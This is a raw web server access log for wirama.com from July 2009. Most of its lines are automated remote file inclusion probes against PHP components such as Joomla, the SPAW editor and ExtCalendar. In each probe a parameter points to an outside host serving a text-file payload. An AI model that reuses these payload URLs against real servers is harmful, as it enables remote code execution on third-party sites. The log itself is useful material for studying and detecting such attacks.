217.22.227.138 - - [02/Jul/2009:04:04:04 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.22.227.138 - - [02/Jul/2009:04:04:05 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.22.227.138 - - [02/Jul/2009:04:04:10 -0700] "GET /logs/access_090330.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
219.85.63.226 - - [02/Jul/2009:04:11:46 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:04:11:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:04:11:46 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:04:12:33 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:04:12:33 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:04:12:33 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [02/Jul/2009:04:14:46 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [02/Jul/2009:04:14:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [02/Jul/2009:04:14:46 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.130.29.11 - - [02/Jul/2009:04:19:52 -0700] "GET //vwar/backup/errors.php?error=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
121.130.29.11 - - [02/Jul/2009:04:19:52 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [02/Jul/2009:04:32:11 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [02/Jul/2009:04:32:11 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [02/Jul/2009:04:32:11 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.30.249.94 - - [02/Jul/2009:04:34:12 -0700] "GET /logs/access_090601.log%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
195.30.249.94 - - [02/Jul/2009:04:34:12 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
195.30.249.94 - - [02/Jul/2009:04:34:12 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
89.19.3.66 - - [02/Jul/2009:04:34:58 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.defendersofthebalance.com/includes/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
89.19.3.66 - - [02/Jul/2009:04:34:58 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.defendersofthebalance.com/includes/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
89.19.3.66 - - [02/Jul/2009:04:34:58 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.defendersofthebalance.com/includes/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
89.19.3.66 - - [02/Jul/2009:04:35:38 -0700] "GET /logs/access_090601.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.defendersofthebalance.com/includes/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
195.30.249.94 - - [02/Jul/2009:04:37:44 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
195.30.249.94 - - [02/Jul/2009:04:38:12 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
89.19.3.66 - - [02/Jul/2009:04:40:42 -0700] "GET /logs/access_090601.log%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.defendersofthebalance.com/includes/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
195.30.249.94 - - [02/Jul/2009:04:41:30 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
195.30.249.94 - - [02/Jul/2009:04:41:30 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.taxratio.com/advancedpoll//cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
89.19.3.66 - - [02/Jul/2009:04:45:29 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.defendersofthebalance.com/includes/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
213.201.230.140 - - [02/Jul/2009:04:45:37 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/images/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "wirama.com"
65.55.106.147 - - [02/Jul/2009:04:46:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
89.19.3.66 - - [02/Jul/2009:04:46:04 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.defendersofthebalance.com/includes/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
89.19.3.66 - - [02/Jul/2009:04:46:04 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.defendersofthebalance.com/includes/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
213.201.230.140 - - [02/Jul/2009:04:48:52 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/images/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
213.201.230.140 - - [02/Jul/2009:04:48:54 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/images/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.wirama.com"
217.22.227.138 - - [02/Jul/2009:04:50:08 -0700] "GET /logs/access_090331.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.22.227.138 - - [02/Jul/2009:04:50:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.22.227.138 - - [02/Jul/2009:04:50:09 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.22.227.138 - - [02/Jul/2009:04:51:44 -0700] "GET /logs/access_090330.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
198.64.149.93 - - [02/Jul/2009:05:11:56 -0700] "GET /logs/access.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
198.64.149.93 - - [02/Jul/2009:05:11:56 -0700] "GET /logs/access.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
198.64.149.93 - - [02/Jul/2009:05:11:56 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 916 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
198.64.149.93 - - [02/Jul/2009:05:11:56 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 916 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
65.55.106.147 - - [02/Jul/2009:05:14:38 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
82.194.87.219 - - [02/Jul/2009:05:19:15 -0700] "GET /logs//poll/comments.php?id=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
218.232.105.116 - - [02/Jul/2009:05:25:15 -0700] "GET /logs/access_090301.log//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [02/Jul/2009:05:25:15 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [02/Jul/2009:05:25:15 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.194.87.219 - - [02/Jul/2009:05:27:29 -0700] "GET /logs///poll/comments.php?id=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
218.232.105.116 - - [02/Jul/2009:05:30:10 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [02/Jul/2009:05:30:10 -0700] "GET /logs/access_090301.log//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.232.105.116 - - [02/Jul/2009:05:30:10 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.80.195.34 - - [02/Jul/2009:05:39:56 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.6-embedded; rev1.6; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "wirama.com"
89.186.1.54 - - [02/Jul/2009:05:51:38 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.wirama.com"
89.186.1.54 - - [02/Jul/2009:05:51:38 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.wirama.com"
89.186.1.54 - - [02/Jul/2009:05:51:38 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.wirama.com"
89.186.1.54 - - [02/Jul/2009:05:51:38 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.wirama.com"
89.186.1.54 - - [02/Jul/2009:05:53:55 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "wirama.com"
89.186.1.54 - - [02/Jul/2009:05:53:55 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "wirama.com"
202.181.243.113 - - [02/Jul/2009:06:00:30 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:06:00:30 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:06:00:30 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:11:24 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:11:30 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:11:31 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:12:09 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:12:11 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:12:11 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:12:16 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:12:17 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:06:12:18 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/Jul/2009:06:26:11 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/Jul/2009:06:26:11 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [02/Jul/2009:06:26:11 -0700] "GET /logs/access_090331.log/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
137.203.140.51 - - [02/Jul/2009:06:26:20 -0700] "GET / HTTP/1.1" 200 916 "http://www.eecs.berkeley.edu/IPRO/startup.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.wirama.com"
137.203.140.51 - - [02/Jul/2009:06:26:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.wirama.com"
137.203.140.51 - - [02/Jul/2009:06:26:24 -0700] "GET /logs/ HTTP/1.1" 200 2374 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.wirama.com"
137.203.140.51 - - [02/Jul/2009:06:26:28 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.wirama.com"
137.203.140.51 - - [02/Jul/2009:06:26:31 -0700] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.wirama.com"
137.203.140.51 - - [02/Jul/2009:06:26:32 -0700] "GET /_private/form_results.csv HTTP/1.1" 200 0 "http://www.wirama.com/_private/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.wirama.com"
80.67.20.178 - - [02/Jul/2009:06:27:48 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.67.20.178 - - [02/Jul/2009:06:27:48 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.67.20.178 - - [02/Jul/2009:06:27:48 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:06:29:04 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [02/Jul/2009:06:29:04 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [02/Jul/2009:06:29:04 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.93.90.155 - - [02/Jul/2009:06:29:05 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:29:05 -0700] "GET /logs/access_090331.log/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:29:05 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:29:17 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.93.90.155 - - [02/Jul/2009:06:29:17 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.93.90.155 - - [02/Jul/2009:06:29:17 -0700] "GET /logs/access_090331.log/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.93.90.155 - - [02/Jul/2009:06:34:17 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:34:22 -0700] "GET /logs/access_090331.log/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:34:22 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.67.20.178 - - [02/Jul/2009:06:34:49 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.67.20.178 - - [02/Jul/2009:06:34:49 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.67.20.178 - - [02/Jul/2009:06:34:49 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.93.90.155 - - [02/Jul/2009:06:38:25 -0700] "GET /logs/access_090401.log/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:39:35 -0700] "GET /logs/access_090401.log/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:06:42:01 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:06:42:01 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:06:42:04 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:45:30 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:45:38 -0700] "GET /logs/access.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:45:38 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [02/Jul/2009:06:45:50 -0700] "GET /logs/access_090531.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://cafe1.fileave.com/ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.106.21.35 - - [02/Jul/2009:06:47:05 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.wirama.com"
